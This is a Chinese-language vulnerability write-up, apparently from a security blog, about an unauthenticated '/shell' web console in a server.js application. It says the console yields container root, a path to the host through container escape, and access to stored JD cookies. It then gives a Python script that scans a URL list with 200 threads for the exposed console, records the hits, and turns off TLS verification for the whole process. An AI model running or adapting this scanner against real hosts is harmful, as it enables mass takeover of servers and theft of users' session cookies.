0x01 漏洞检测
漏洞payload: http://IP/shell
0x02 漏洞验证
在server.js代码中, 使用了在线的shell控制台, 该控制台未进行鉴权, 导致存在未授权访问
通过该漏洞获取容器中的root权限, 可通过容器逃逸获取宿主机权限
读取的京东cookie
以下为批量脚本, 代码比较粗糙,大佬勿喷
# -*- coding: utf-8 -*-
# @Time : 2021/6/30 9:07
# @Author : AD钙奶
import json
import re
import ssl
import time
from pathlib import Path

import requests
import threadpool
from loguru import logger
# Relax TLS handling for the whole process: silence urllib3's insecure-request
# warning and swap the ssl module's default HTTPS context for the unverified
# one, so endpoints with self-signed or otherwise invalid certificates are not
# rejected.
# NOTE(review): the patch is module-global and persists for the lifetime of
# the process, so any other HTTPS traffic this process makes also loses
# certificate checking. Whether requests.get() (which builds its own
# context) honours ssl._create_default_https_context is not established
# here — confirm before relying on it.
try:
    requests.packages.urllib3.disable_warnings()
    _create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
    # Best-effort: a build without the private ssl helper (or without
    # requests.packages) keeps the verifying default.
    pass
else:
    ssl._create_default_https_context = _create_unverified_https_context
def brute_force(_url: str) -> None:
    """Probe one base URL for an unauthenticated ``/shell`` endpoint.

    Sends a single GET to ``<_url>/shell`` with browser-like headers and,
    when the response is HTTP 200 and carries a ``Set-Cookie`` header,
    appends the URL to a dated file via ``save_vuln`` and logs it.

    Every exception — network errors, the 20 s timeout, and the ``KeyError``
    raised when ``Set-Cookie`` is absent — is swallowed, so a non-matching
    host and an unreachable host are indistinguishable to the caller.

    Args:
        _url: Base URL that ``/shell`` is appended to; presumably given
            without a trailing slash (e.g. ``http://host:port``) — confirm
            against the contents of the target file.
    """
    urls = _url + '/shell'
    # Static browser-like headers; the match condition below does not depend
    # on any of them.
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
        "Cache-Control": "max-age=0",
        "Connection": "keep-alive",
        "Cookie": "",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59",
    }
    try:
        resp = requests.get(url=urls, headers=headers, timeout=20)
        # NOTE(review): headers['Set-Cookie'] raises KeyError when the header
        # is missing; that KeyError falls into the handler below and is the
        # de-facto "no match" path. The condition is weak — any 200 page that
        # sets a cookie (a login form, for instance) satisfies it, so matches
        # are not confirmation of the unauthenticated console.
        if resp.status_code == 200 and resp.headers['Set-Cookie']:
            info1 = f"系统存在未授权漏洞,存在漏洞的网站: {str(urls)}"
            # One output file per day; the prefix is the current date.
            filename1 = time.strftime("%Y-%m-%d-") + 'vuln_存在未授权.txt'
            save_vuln(filename1, info1)
            logger.info(info1)
    except Exception as e:
        # Deliberate best-effort: failures of any kind are silently skipped
        # (including a missing ./result directory in save_vuln).
        pass
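def save_vuln(filename: str, info1: str) -> None:
    """Append one line of text to ``./result/<filename>``.

    The ``result`` directory is created on first use; previously a missing
    directory raised ``FileNotFoundError``, which the caller's broad
    ``except`` swallowed, so findings were silently lost. The file is
    opened as UTF-8 explicitly because the recorded text contains
    non-ASCII characters and the platform default encoding is not
    guaranteed to represent them.

    Args:
        filename: Name of the output file, relative to ``./result/``.
        info1: Text to record; a trailing newline is added.
    """
    # Keep the original string concatenation so the resulting path is the
    # same one earlier runs wrote to.
    out_path = Path('./result/' + filename)
    out_path.parent.mkdir(parents=True, exist_ok=True)
    with out_path.open("a", encoding="utf-8") as f:
        f.write(info1 + '\n')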
def open_file() -> list[str]:
    """Read target base URLs, one per line, from ``url3.txt`` in the cwd.

    Leading/trailing whitespace is stripped and blank lines are dropped.

    Returns:
        The non-empty, stripped lines in file order.
    """
    with open("url3.txt", 'r', encoding='UTF-8') as handle:
        targets = [line.strip() for line in handle if line.strip()]
    return targets
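def main() -> None:
    """Run ``brute_force`` over every URL in ``url3.txt`` on a thread pool.

    A 200-worker ``threadpool.ThreadPool`` is used and the call blocks until
    all queued requests have finished. Output is produced by ``brute_force``
    itself; nothing is returned.
    """
    targets = open_file()
    pool = threadpool.ThreadPool(200)
    # putRequest is called purely for its side effect, so use a plain loop
    # instead of building a throwaway list with a comprehension.
    for work_request in threadpool.makeRequests(brute_force, targets):
        pool.putRequest(work_request)
    pool.wait()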
if __name__ == '__main__':
    # Script entry point; importing the module defines functions only.
    main()